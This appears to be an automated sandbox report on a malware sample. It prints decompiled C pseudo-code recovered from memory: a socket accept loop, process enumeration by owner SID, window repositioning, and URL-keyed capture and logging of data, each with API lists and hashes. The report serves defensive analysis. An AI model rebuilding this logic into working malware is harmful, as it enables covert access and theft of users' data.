    • Opcode Fuzzy Hash: da1402a21e1fe198c6858913a0838f65cb266c623abc251331a159136cc6fbf1
    • Instruction Fuzzy Hash: F351D330604301DFC720DF28D985A9ABBE5FF84364F104A1AFA50972B1D738ED81CB89
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00410F1A(void* __ecx, void* __eflags) {
    				intOrPtr _v74;
    				signed int _v78;
    				char _v124;
    				char _v128;
    				intOrPtr _v140;
    				void* _v144;
    				intOrPtr _v148;
    				void* _v152;
    				void* _v156;
    				void* _v160;
    				char _v164;
    				void* _v168;
    				signed int _v172;
    				long _v184;
    				void* __esi;
    				void* _t47;
    				void* _t49;
    				void* _t55;
    				void* _t56;
    				void* _t57;
    				long _t59;
    				intOrPtr _t64;
    				long _t65;
    				void* _t72;
    				signed int _t83;
    				intOrPtr* _t85;
    				signed int _t94;
    				long _t97;
    				signed int _t98;
    				void* _t100;
    
    				_t100 = (_t98 & 0xfffffff8) - 0xac;
    				_t83 = 2;
    				_t47 = E0040679A(__ecx, 0x743c152e, _t83);
    				_v156 = _t47;
    				if(_t47 != 0) {
    					if(E004068C0() == 0) {
    						L26:
    						E00419BF4(_v148);
    						_t49 = 0;
    						L27:
    						return _t49;
    					}
    					E0041CD26(__ecx,  &_v124);
    					_t87 = _v78;
    					_t94 = E00410DC5( &_v160, _v78,  &_v168) & 0x0000ffff;
    					if(_t94 != 0) {
    						L7:
    						if(_t94 != _v74) {
    							E0041CDE1( &_v124);
    							_v78 = _t94;
    							E0041CE39( &_v128);
    						}
    						_t55 =  *0x422e04; // 0x0
    						_v144 = _t55;
    						_t56 = _v152;
    						_v172 = 1;
    						if(_t56 != 0) {
    							_v140 = _t56;
    							_v172 = _t83;
    						}
    						_t57 = _v160;
    						if(_t57 != 0) {
    							_t87 = _v172;
    							_v172 = _v172 + 1;
    							 *((intOrPtr*)(_t100 + 0x2c + _v172 * 4)) = _t57;
    						}
    						_t59 = WaitForMultipleObjects(_v172,  &_v144, 0, 0xffffffff);
    						if(_t59 <= 0) {
    							L25:
    							E004197C4(_t59, _v156);
    							E004197C4(CloseHandle(_v152), _v164);
    							CloseHandle(_v160);
    							goto L26;
    						} else {
    							_t85 = __imp__#1;
    							while(_t59 < _v172) {
    								_t64 =  *((intOrPtr*)(_t100 + 0x2c + _t59 * 4));
    								if(_t64 != _v152) {
    									if(_t64 != _v160) {
    										while(1) {
    											L23:
    											_t65 =  *_t85(_v168, 0, 0);
    											_t97 = _t65;
    											if(_t97 == 0xffffffff) {
    												break;
    											}
    											__imp__WSAEventSelect(_t97, 0, 0);
    											_v156 = 0;
    											__imp__WSAIoctl(_t97, 0x8004667e,  &_v156, 4, 0, 0,  &_v152, 0, 0);
    											E0041981C(_t87, _t97);
    											if(E00417E56(0x20000, E00410E4D, _t97) == 0) {
    												E004197C4(_t69, _t97);
    											}
    										}
    										_t59 = WaitForMultipleObjects(_v184,  &_v156, 0, _t65);
    										if(_t59 > 0) {
    											continue;
    										}
    										goto L25;
    									}
    									_t72 = _v164;
    									L20:
    									_v168 = _t72;
    									goto L23;
    								}
    								_t72 = _v156;
    								goto L20;
    							}
    							goto L25;
    						}
    					}
    					while(WaitForSingleObject( *0x422e04, 0x3e8) == 0x102) {
    						_t87 = _v74;
    						_t94 = E00410DC5( &_v156, _v74,  &_v164) & 0x0000ffff;
    						if(_t94 == 0) {
    							continue;
    						}
    						break;
    					}
    					if(_t94 == 0) {
    						goto L26;
    					}
    					goto L7;
    				}
    				_t49 = 1;
    				goto L27;
    			}

    APIs
      • Part of subcall function 0040679A: CreateMutexW.KERNEL32(00422978,00000000,?,?,?,?,?), ref: 004067BB
    • WaitForSingleObject.KERNEL32(000003E8,?,?,743C152E,00000002), ref: 00410F85
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF,?,?,743C152E), ref: 00411016
    • accept.WS2_32(?,00000000,00000000), ref: 004110A2
    • WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 004110B6
    • CloseHandle.KERNEL32(?), ref: 004110D7
    • CloseHandle.KERNEL32(?), ref: 004110E6
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Wait$CloseHandleMultipleObjects$CreateMutexObjectSingleaccept
    • String ID:
    • API String ID: 38240579-0
    • Opcode ID: 1565d399004beede7f2db68433f18c8e662f5a84f24f131b869312ad8ea393a1
    • Instruction ID: 8b40969400a0f428c40e04034a8f074897f883eddacf8aa2981f0e7da8c8b669
    • Opcode Fuzzy Hash: 1565d399004beede7f2db68433f18c8e662f5a84f24f131b869312ad8ea393a1
    • Instruction Fuzzy Hash: 87518D31508241ABC720EF65DD85CAFBBE8EB88704F10092EF694E31A0D7749DC58B1A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041CB9B() {
    				long _v564;
    				char _v568;
    				void* _v572;
    				char _v576;
    				void* _v580;
    				void* _v584;
    				void* _v588;
    				char _v589;
    				signed int _v592;
    				signed int _v596;
    				char _v597;
    				void* __esi;
    				void* _t42;
    				struct tagPROCESSENTRY32W* _t45;
    				signed int _t47;
    				void* _t48;
    				long _t56;
    				intOrPtr* _t57;
    				void** _t59;
    				void** _t60;
    				void** _t62;
    				long _t67;
    				int _t74;
    				void** _t76;
    				void* _t79;
    
    				_t74 = 0;
    				_v589 = 0;
    				_v584 = 0;
    				_v588 = 0;
    				while(1) {
    					_t42 = CreateToolhelp32Snapshot(2, _t74);
    					_v584 = _t42;
    					_v580 = _t74;
    					if(_t42 == 0xffffffff) {
    						break;
    					} else {
    						_t45 =  &_v568;
    						_v568 = 0x22c;
    						Process32FirstW(_v584, _t45);
    					}
    					while(_t45 != 0) {
    						_t67 = _v564;
    						__eflags = _t67 - _t74;
    						if(_t67 <= _t74) {
    							L20:
    							_t45 = Process32NextW(_v588,  &_v572);
    							continue;
    						}
    						__eflags = _t67 -  *0x422bb0; // 0x0
    						if(__eflags == 0) {
    							goto L20;
    						}
    						_t47 = 0;
    						__eflags = _v596 - _t74;
    						if(_v596 <= _t74) {
    							L8:
    							_t48 = E004066F1(_t67, _t72, _t67);
    							_v584 = _t48;
    							__eflags = _t48 - _t74;
    							if(_t48 == _t74) {
    								goto L20;
    							}
    							_t79 = OpenProcess(0x400, _t74, _v564);
    							__eflags = _t79 - _t74;
    							if(_t79 == _t74) {
    								L19:
    								CloseHandle(_v580);
    								goto L20;
    							}
    							_t76 = E00417A38(_t67, _t79,  &_v576);
    							CloseHandle(_t79);
    							__eflags = _t76;
    							if(_t76 == 0) {
    								L18:
    								_t74 = 0;
    								__eflags = 0;
    								goto L19;
    							} else {
    								__eflags = _v576 -  *0x422950; // 0x0
    								if(__eflags == 0) {
    									_t56 = GetLengthSid( *_t76);
    									__eflags = _t56 -  *0x422948;
    									if(_t56 ==  *0x422948) {
    										_t57 =  *0x422944; // 0x0
    										_t59 = E00416492( *_t57,  *_t76, _t56);
    										__eflags = _t59;
    										if(_t59 == 0) {
    											_t60 = E004163AC(4 + _v596 * 4,  &_v592);
    											__eflags = _t60;
    											if(_t60 != 0) {
    												_t72 = _v596;
    												_v596 = _v596 + 1;
    												_v584 = _v584 + 1;
    												 *((intOrPtr*)(_v592 + _v596 * 4)) = _v564;
    												_t62 = E0041CB12(_v592, _v564, _v580);
    												__eflags = _t62;
    												if(_t62 != 0) {
    													_v597 = 1;
    												}
    											}
    										}
    									}
    								}
    								E00416421(_t76);
    								goto L18;
    							}
    						} else {
    							goto L6;
    						}
    						while(1) {
    							L6:
    							_t72 = _v592;
    							__eflags =  *((intOrPtr*)(_t72 + _t47 * 4)) - _t67;
    							if( *((intOrPtr*)(_t72 + _t47 * 4)) == _t67) {
    								goto L20;
    							}
    							_t47 = _t47 + 1;
    							__eflags = _t47 - _v596;
    							if(_t47 < _v596) {
    								continue;
    							}
    							goto L8;
    						}
    						goto L20;
    					}
    					CloseHandle(_v588);
    					if(_v584 != _t74) {
    						continue;
    					}
    					break;
    				}
    				E00416421(_v588);
    				return _v597;
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041CBC2
    • Process32FirstW.KERNEL32 ref: 0041CBEA
    • OpenProcess.KERNEL32(00000400,00000000,0000022C,0000022C), ref: 0041CC45
    • CloseHandle.KERNEL32(00000000,00000000,?), ref: 0041CC63
    • GetLengthSid.ADVAPI32(00000000), ref: 0041CC77
    • CloseHandle.KERNEL32(?), ref: 0041CCE9
    • Process32NextW.KERNEL32(?,?), ref: 0041CCF4
    • CloseHandle.KERNEL32(?), ref: 0041CD06
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandle$Process32$CreateFirstLengthNextOpenProcessSnapshotToolhelp32
    • String ID:
    • API String ID: 1981844004-0
    • Opcode ID: 2e97cd70e9e722d8d097b33df0c4f51812a0ac5d08a9eb1ab3aaa51b5f920af1
    • Instruction ID: b0cbfc17900ba3c44c69b3fd161efd8ff52d1b3e4aca9ae37c93d05d0b6cca63
    • Opcode Fuzzy Hash: 2e97cd70e9e722d8d097b33df0c4f51812a0ac5d08a9eb1ab3aaa51b5f920af1
    • Instruction Fuzzy Hash: D4415B70148341EBC711EF25DD849ABBBE5BF89304F10092EF99992260E735DD85CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004075F4(int __eax, long __ecx, void* __edx) {
    				struct HWND__* _v8;
    				signed short _v12;
    				int _v16;
    				long _v20;
    				struct tagPOINT _v28;
    				intOrPtr _t46;
    				int _t50;
    				signed int _t51;
    				signed int _t52;
    				signed int _t63;
    				signed int _t64;
    				signed int _t67;
    				signed int _t69;
    				signed int _t70;
    				signed int _t71;
    				int _t73;
    				void* _t74;
    				long _t78;
    				void* _t79;
    				void* _t80;
    				intOrPtr _t81;
    
    				_t80 = __edx;
    				_t73 = __eax;
    				_t78 = __ecx;
    				WaitForSingleObject( *(__edx + 0x14), 0xffffffff);
    				_t46 =  *((intOrPtr*)(_t80 + 0x10));
    				_v8 =  *((intOrPtr*)(_t46 + 0x108));
    				_v12 =  *(_t46 + 0x110) & 0x0000ffff;
    				ReleaseMutex( *(_t80 + 0x14));
    				_t50 = GetWindowRect(_v8,  &_v28);
    				if(_t50 != 0) {
    					if(_v12 != 2) {
    						_t51 = _v12 & 0x0000ffff;
    						__eflags = _t51 - 0xd;
    						if(__eflags > 0) {
    							_t52 = _t51 - 0xe;
    							__eflags = _t52;
    							if(_t52 == 0) {
    								_v20 = _t78;
    								goto L22;
    							} else {
    								_t63 = _t52 - 1;
    								__eflags = _t63;
    								if(_t63 == 0) {
    									_v16 = _t73;
    								} else {
    									_t64 = _t63 - 1;
    									__eflags = _t64;
    									if(_t64 == 0) {
    										_v16 = _t73;
    										goto L19;
    									} else {
    										__eflags = _t64 == 1;
    										if(_t64 == 1) {
    											goto L16;
    										}
    									}
    								}
    							}
    						} else {
    							if(__eflags == 0) {
    								L11:
    								_v28.x = _t78;
    								goto L22;
    							} else {
    								_t67 = _t51;
    								__eflags = _t67;
    								if(_t67 == 0) {
    									goto L11;
    								} else {
    									_t69 = _t67;
    									__eflags = _t69;
    									if(_t69 == 0) {
    										L16:
    										_v16 = _t73;
    										goto L17;
    									} else {
    										_t70 = _t69 - 6;
    										__eflags = _t70;
    										if(_t70 == 0) {
    											L19:
    											_v28.x = _t78;
    										} else {
    											_t71 = _t70 - 1;
    											__eflags = _t71;
    											if(_t71 == 0) {
    												L17:
    												_v20 = _t78;
    											} else {
    												__eflags = _t71 == 1;
    												if(_t71 == 1) {
    													L22:
    													_v28.y = _t73;
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						_t81 =  *((intOrPtr*)(_t80 + 0x10));
    						_t79 = _t78 -  *((intOrPtr*)(_t81 + 0x100));
    						_t74 = _t73 -  *((intOrPtr*)(_t81 + 0x104));
    						_v28.x = _v28.x + _t79;
    						_v28.y = _v28.y + _t74;
    						_v20 = _v20 + _t79;
    						_v16 = _v16 + _t74;
    					}
    					_t50 = IsRectEmpty( &_v28);
    					if(_t50 == 0) {
    						if((GetWindowLongW(_v8, 0xfffffff0) & 0x40000000) != 0) {
    							MapWindowPoints(0, GetParent(_v8),  &_v28, 2);
    						}
    						return SetWindowPos(_v8, 0, _v28.x, _v28.y, _v20 - _v28, _v16 - _v28.y, 0x630c);
    					}
    				}
    				return _t50;
    			}

    0x004075fd
    0x00407604
    0x00407606
    0x00407608
    0x0040760e
    0x00407621
    0x00407624
    0x00407627
    0x00407634
    0x0040763c
    0x00407647
    0x00407666
    0x0040766a
    0x0040766d
    0x0040768b
    0x0040768b
    0x0040768e
    0x004076ae
    0x00000000
    0x00407690
    0x00407690
    0x00407690
    0x00407691
    0x004076a9
    0x00407693
    0x00407693
    0x00407693
    0x00407694
    0x004076a1
    0x00000000
    0x00407696
    0x00407696
    0x00407697
    0x00000000
    0x00000000
    0x00407697
    0x00407694
    0x00407691
    0x0040766f
    0x0040766f
    0x00407686
    0x00407686
    0x00000000
    0x00407671
    0x00407672
    0x00407672
    0x00407673
    0x00000000
    0x00407675
    0x00407676
    0x00407676
    0x00407677
    0x00407699
    0x00407699
    0x00000000
    0x00407679
    0x00407679
    0x00407679
    0x0040767c
    0x004076a4
    0x004076a4
    0x0040767e
    0x0040767e
    0x0040767e
    0x0040767f
    0x0040769c
    0x0040769c
    0x00407681
    0x00407681
    0x00407682
    0x004076b1
    0x004076b1
    0x004076b1
    0x00407682
    0x0040767f
    0x0040767c
    0x00407677
    0x00407673
    0x0040766f
    0x00407649
    0x00407649
    0x0040764c
    0x00407652
    0x00407658
    0x0040765b
    0x0040765e
    0x00407661
    0x00407661
    0x004076b8
    0x004076c0
    0x004076d2
    0x004076e6
    0x004076e6
    0x00000000
    0x0040770a
    0x004076c0
    0x00407714

    APIs
    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00407608
    • ReleaseMutex.KERNEL32(?), ref: 00407627
    • GetWindowRect.USER32 ref: 00407634
    • IsRectEmpty.USER32(?), ref: 004076B8
    • GetWindowLongW.USER32(?,000000F0), ref: 004076C7
    • GetParent.USER32(?), ref: 004076DD
    • MapWindowPoints.USER32 ref: 004076E6
    • SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 0040770A
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Window$Rect$EmptyLongMutexObjectParentPointsReleaseSingleWait
    • String ID:
    • API String ID: 2634726239-0
    • Opcode ID: 5bba1a825e21bfb67c7bf15ea1a917b011608e6a097dce4e4fdde1a571f89946
    • Instruction ID: 2f56ed97006f8743b138d37b0a4de8c432a844e7f4ec856645651dc1a4a748d9
    • Opcode Fuzzy Hash: 5bba1a825e21bfb67c7bf15ea1a917b011608e6a097dce4e4fdde1a571f89946
    • Instruction Fuzzy Hash: 59412171D0460AAFDF109FACC9459FEBBB4FB04360F10097AE512F22A1D779A940DB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E00410561(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
    				char _v540;
    				char _v800;
    				char _v804;
    				char _v860;
    				struct _SYSTEMTIME _v876;
    				char _v900;
    				signed int _v968;
    				signed int _v980;
    				intOrPtr _v984;
    				intOrPtr _v988;
    				char* _v992;
    				char _v996;
    				void* _v1008;
    				struct _SYSTEMTIME _v1028;
    				signed int _v1032;
    				short _v1036;
    				signed short* _v1040;
    				signed int _v1044;
    				intOrPtr* _v1048;
    				signed int _v1052;
    				signed int _v1056;
    				signed int _v1060;
    				signed int _v1064;
    				char _v1068;
    				intOrPtr _v1072;
    				char _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t158;
    				signed int _t159;
    				intOrPtr _t160;
    				signed int _t168;
    				void* _t188;
    				void* _t199;
    				signed int _t211;
    				signed int _t215;
    				signed int _t218;
    				signed char _t222;
    				signed int _t224;
    				void* _t227;
    				void* _t228;
    				signed int _t229;
    				signed int _t230;
    				signed int _t240;
    				void* _t242;
    				signed int _t250;
    				intOrPtr* _t254;
    				signed int _t255;
    				intOrPtr _t258;
    				short* _t261;
    				void* _t280;
    				intOrPtr* _t286;
    				signed int _t291;
    				long _t294;
    				signed short* _t296;
    				signed short* _t298;
    				signed int _t301;
    				intOrPtr* _t303;
    				signed int _t307;
    				void* _t309;
    
    				_t309 = (_t307 & 0xfffffff8) - 0x424;
    				_v1032 = _v1032 & 0x00000000;
    				if(__eax == 0) {
    					L52:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t286 = __ecx + 0x10;
    					_v1048 = _t286;
    					_v1028.wDayOfWeek = __eax;
    					do {
    						_t258 =  *_t286;
    						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
    						_v1028.wHour = _t279;
    						if(_t258 == 0) {
    							_t254 = _a8;
    							L6:
    							_t259 =  *(_t286 + 4);
    							_v1052 = _v1052 & 0x00000000;
    							_v1064 = _v1064 & 0x00000000;
    							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
    							_v1028.wSecond = _t158;
    							if(_t259 >= _t158) {
    								L35:
    								_t159 =  *(_t286 - 0x10);
    								_t294 = 0;
    								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
    									if((_t159 & 0x00000200) == 0) {
    										_t255 = E00416661(_t159 | 0xffffffff, 0, _a4);
    										__eflags = _t255;
    										if(_t255 != 0) {
    											_t188 = 9;
    											E004159A4(_t188,  &_v996);
    											_push(_v1052);
    											E00405851(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
    											_t309 = _t309 + 0x18;
    											E00416421(_t255);
    										}
    									} else {
    										_t280 = 0x3c;
    										E004164D4( &_v996,  &_v996, 0, _t280);
    										_v992 =  &_v800;
    										_v1008 = _t280;
    										_v988 = 0x103;
    										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
    											GetSystemTime( &_v1028);
    											_t306 =  &_v876;
    											_t199 = 8;
    											E004159A4(_t199,  &_v876);
    											_push(_v1028.wDay & 0x0000ffff);
    											_push(_v1028.wMonth & 0x0000ffff);
    											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
    											_push( &_v804);
    											E00417114( &_v876, 0x104,  &_v540, _t306);
    											_t309 = _t309 + 0x14;
    											E004056A7(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
    											_t286 = _v1084;
    										}
    									}
    									E00416421(_v1052);
    									_t294 = 0;
    								}
    								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
    									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x4230bc);
    										E00416421( *0x4230d4);
    										_t168 = E0041687F(E00416421( *0x4230d8) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
    										 *0x4230d4 = _t168;
    										__eflags = _t168 | 0xffffffff;
    										 *0x4230d8 = E0041687F(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
    										LeaveCriticalSection(0x4230bc);
    										goto L51;
    									}
    									E00406B47( &_v860, _t259, 1,  &_v996);
    									if(E004176C6( &_v900,  *((intOrPtr*)(_t286 - 4)), E00416F5E( *((intOrPtr*)(_t286 - 4)))) == 0) {
    										goto L51;
    									}
    									_t261 =  &_v860;
    									do {
    										E00416789( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
    										_t294 = _t294 + 1;
    										_t261 = _t261 + 4;
    									} while (_t294 < 0x10);
    									 *_t261 = 0;
    									GetLocalTime( &_v876);
    									E0041A6A0(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
    								}
    								goto L51;
    							} else {
    								goto L9;
    								L13:
    								_t279 =  *_t211 & 0x0000ffff;
    								if(_t279 != 4) {
    									_t259 = _t211 + 4;
    									_t218 = E0040F887(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
    									__eflags = _t218;
    									if(_t218 == 0) {
    										L33:
    										if(_v1028.wYear < _v1028.wSecond) {
    											_t259 = _v1028.wYear;
    											L9:
    											_t211 = ( *_t259 & 0x0000ffff) + _t259;
    											_t296 = ( *_t211 & 0x0000ffff) + _t211;
    											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
    											_t279 =  *_t259 & 0x0000ffff;
    											_v1036 = _t259;
    											_v1044 = _t211;
    											_v1040 = _t296;
    											if(( *_t259 & 0x0000ffff) != 4) {
    												goto L11;
    											} else {
    												_v1060 = _v1060 & 0x00000000;
    												goto L13;
    											}
    										}
    										_t286 = _v1048;
    										goto L35;
    									}
    									__eflags =  *_v1036 - 4;
    									_t298 = _v1040;
    									if( *_v1036 != 4) {
    										_t54 =  &_v1056;
    										 *_t54 = _v1056 + _v1060;
    										__eflags =  *_t54;
    									} else {
    										_v1060 = _v1056;
    									}
    									L22:
    									_t259 = _v1056 - _v1060;
    									_t222 =  *(_v1048 - 0x10);
    									_t291 = ( *_t298 & 0x0000ffff) - 4;
    									_v1044 = _t259;
    									if((_t222 & 0x00000004) == 0) {
    										__eflags = _t222 & 0x00000008;
    										if((_t222 & 0x00000008) != 0) {
    											_t224 = E004163AC(_t259 + _t291 + _v1064 + 2,  &_v1052);
    											__eflags = _t224;
    											if(_t224 != 0) {
    												_t301 = _v1052;
    												__eflags = _t291;
    												if(_t291 != 0) {
    													E0041645D(_v1064 + _t301,  &(_v1040[2]), _t291);
    													_t84 =  &_v1076;
    													 *_t84 = _v1076 + _t291;
    													__eflags =  *_t84;
    												}
    												_t279 = _v1044;
    												_t227 = E0041645D(_v1064 + _t301,  *_t254 + _v1060, _t279);
    												_t259 = _v1060;
    												__eflags =  *(_t259 - 0x10) & 0x00000100;
    												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
    													_t228 = E0041B050(_t227, _t279);
    													_t95 =  &_v1068;
    													 *_t95 = _v1068 + _t228;
    													__eflags =  *_t95;
    													_t254 = _a8;
    												} else {
    													_v1064 = _v1064 + _t279;
    												}
    												_t229 = _v1064;
    												 *((char*)(_t229 + _t301)) = 0xa;
    												_t230 = _t229 + 1;
    												__eflags = _t230;
    												_v1064 = _t230;
    												 *((char*)(_t230 + _t301)) = 0;
    											}
    										}
    									} else {
    										_v1036 =  *_a12 - _t259 + _t291;
    										_t240 = E004163F1( *_a12 - _t259 + _t291);
    										_v1044 = _t240;
    										if(_t240 != 0) {
    											_t279 = _v1060;
    											_t242 = E0041645D(E0041645D(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
    											_t303 = _a12;
    											_t259 =  *_t254 + _v1080;
    											E0041645D(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
    											E00416421( *_t254);
    											_v1072 = _v1072 + 1;
    											 *_t254 = _v1084;
    											 *_t303 = _v1076;
    										}
    									}
    									goto L33;
    								}
    								if( *_t259 != _t279) {
    									_t250 = _v1060;
    								} else {
    									_t250 =  *_a12;
    								}
    								_v1056 = _t250;
    								goto L22;
    								L11:
    								_t215 = E0040F887(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									goto L33;
    								}
    								_t298 = _v1040;
    								_t211 = _v1044;
    								_t259 = _v1036;
    								goto L13;
    							}
    						}
    						_v996 = 0x2a3f;
    						_v992 = _t258;
    						_t160 = E00416F5E(_t258);
    						_t254 = _a8;
    						_v988 = _t160;
    						_v984 =  *_t254;
    						_t279 = _t279 | 0x00000012;
    						_v980 =  *_a12;
    						_v968 = _t279;
    						if(E004173A5( &_v996) != 0) {
    							goto L6;
    						}
    						L51:
    						_t286 = _t286 + 0x1c;
    						_t150 =  &(_v1028.wDayOfWeek);
    						 *_t150 = _v1028.wDayOfWeek - 1;
    						_v1048 = _t286;
    					} while ( *_t150 != 0);
    					goto L52;
    				}
    			}

    0x00410567
    0x0041056d
    0x00410577
    0x00410a02
    0x00410a09
    0x00410a12
    0x0041057d
    0x0041057d
    0x00410580
    0x00410584
    0x00410588
    0x0041058b
    0x00410590
    0x00410593
    0x00410599
    0x004105db
    0x004105de
    0x004105de
    0x004105e4
    0x004105e9
    0x004105ee
    0x004105f0
    0x004105f6
    0x004107f8
    0x004107f8
    0x004107fb
    0x004107ff
    0x00410814
    0x004108d9
    0x004108db
    0x004108dd
    0x004108e5
    0x004108e6
    0x004108eb
    0x004108fb
    0x00410900
    0x00410904
    0x00410904
    0x0041081a
    0x0041081c
    0x00410824
    0x00410830
    0x0041083e
    0x00410842
    0x00410853
    0x00410868
    0x00410870
    0x00410877
    0x00410878
    0x00410882
    0x00410888
    0x00410893
    0x0041089b
    0x004108ab
    0x004108b0
    0x004108c2
    0x004108c7
    0x004108c7
    0x00410853
    0x0041090d
    0x00410912
    0x00410912
    0x00410917
    0x00410921
    0x004109ae
    0x004109ba
    0x004109d0
    0x004109d5
    0x004109dd
    0x004109e6
    0x004109eb
    0x00000000
    0x004109eb
    0x00410935
    0x00410953
    0x00000000
    0x00000000
    0x00410959
    0x00410960
    0x00410967
    0x0041096c
    0x0041096d
    0x00410970
    0x00410977
    0x00410982
    0x004109a1
    0x004109a1
    0x00000000
    0x004105fc
    0x004105fc
    0x00410661
    0x00410661
    0x00410667
    0x0041069a
    0x004106a1
    0x004106a6
    0x004106a8
    0x004107e6
    0x004107ee
    0x004105fe
    0x00410602
    0x00410605
    0x0041060a
    0x00410611
    0x00410615
    0x00410618
    0x0041061c
    0x00410620
    0x00410627
    0x00000000
    0x00410629
    0x00410629
    0x00000000
    0x00410629
    0x00410627
    0x004107f4
    0x00000000
    0x004107f4
    0x004106b2
    0x004106b6
    0x004106ba
    0x004106ca
    0x004106ca
    0x004106ca
    0x004106bc
    0x004106c0
    0x004106c0
    0x004106ce
    0x004106d9
    0x004106dd
    0x004106e0
    0x004106e3
    0x004106e9
    0x0041075b
    0x0041075d
    0x00410771
    0x00410776
    0x00410778
    0x0041077a
    0x0041077e
    0x00410780
    0x00410792
    0x00410797
    0x00410797
    0x00410797
    0x00410797
    0x0041079d
    0x004107ae
    0x004107b3
    0x004107b7
    0x004107be
    0x004107c9
    0x004107ce
    0x004107ce
    0x004107ce
    0x004107d2
    0x004107c0
    0x004107c0
    0x004107c0
    0x004107d5
    0x004107d9
    0x004107dd
    0x004107dd
    0x004107de
    0x004107e2
    0x004107e2
    0x00410778
    0x004106eb
    0x004106f4
    0x004106f8
    0x004106fd
    0x00410703
    0x00410709
    0x0041071f
    0x00410724
    0x00410732
    0x0041073a
    0x00410741
    0x0041074a
    0x0041074e
    0x00410754
    0x00410754
    0x00410703
    0x00000000
    0x004106e9
    0x0041066c
    0x00410675
    0x0041066e
    0x00410671
    0x00410671
    0x00410679
    0x00000000
    0x00410630
    0x00410648
    0x0041064d
    0x0041064f
    0x00000000
    0x00000000
    0x00410655
    0x00410659
    0x0041065d
    0x00000000
    0x0041065d
    0x004105f6
    0x0041059b
    0x004105a2
    0x004105a6
    0x004105ab
    0x004105ae
    0x004105b4
    0x004105bd
    0x004105c4
    0x004105c8
    0x004105d3
    0x00000000
    0x004105d9
    0x004109f1
    0x004109f1
    0x004109f4
    0x004109f4
    0x004109f8
    0x004109f8
    0x00000000
    0x00410588

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041084A
    • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 00410868
    • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,-00422FC8,?,?), ref: 00410982
    • EnterCriticalSection.KERNEL32(004230BC,-00422FC8,?,?), ref: 004109AE
    • LeaveCriticalSection.KERNEL32(004230BC,?,?), ref: 004109EB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202773445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.202769592.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.202789916.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.202793327.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: ?*
    • API String ID: 2400141425-3267162389
    • Opcode ID: 7a8bab96758f575b0ca7e7104651cf23deff2d138a5f4399124a1fd2daf129c0
    • Instruction ID: 093aec45270c21eec4155e6c40de1c91451f30bafe846d90150bca3185321780
    • Opcode Fuzzy Hash: 7a8bab96758f575b0ca7e7104651cf23deff2d138a5f4399124a1fd2daf129c0
    • Instruction Fuzzy Hash: 67E19CB16083419FD710DF69C880AAFB7E5FF88318F00492EF89597251D778E985CB6A
    Uniqueness

    Uniqueness Score: -1.00%

